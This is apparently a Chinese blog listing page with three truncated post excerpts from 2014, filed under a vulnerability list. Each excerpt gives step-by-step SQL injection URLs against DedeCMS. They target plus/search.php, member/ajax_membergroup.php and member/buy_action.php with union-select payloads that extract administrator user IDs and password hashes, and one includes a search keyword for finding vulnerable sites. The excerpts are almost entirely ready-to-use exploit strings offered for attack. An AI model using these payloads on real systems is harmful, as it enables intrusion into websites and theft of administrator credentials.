• 先提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a 看结果如果提示 1、Safe Alert: Request Error step 2 ! 那么直接用下面的exp http://www.xxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3, 4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+fr...
    作者:熊猫| 发布:2014年1月21日| 阅读:1,999次| 分类:PHP, 漏洞列表, 编程语言| 标签:,
  • 一、首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,(判断是否是dede的cms 以及看看是否和这个漏洞相对应) 二、然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面 看是否可注入 三、爆用户:/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id ...
    作者:熊猫| 发布:2014年1月21日| 阅读:3,052次| 分类:PHP, 漏洞列表, 编程语言| 标签:,
  • 关键词:powered by dedecms 首先注册个用户,注册地址: /member/index_do.php?fmdo=user&dopost=regnew 爆管理帐号: /member/buy_action.php?product=member&pid=1%20and%201=11%20union %20select%201,2,userid,4,5%20from%20%23@__admin/* 爆管理员密码 /member/buy_action.php?product=member&pid=1%20and%201=11%20union%20 select%201,2,substring(pwd,9,1...
    作者:熊猫| 发布:2014年1月21日| 阅读:2,613次| 分类:PHP, 漏洞列表, 编程语言| 标签:,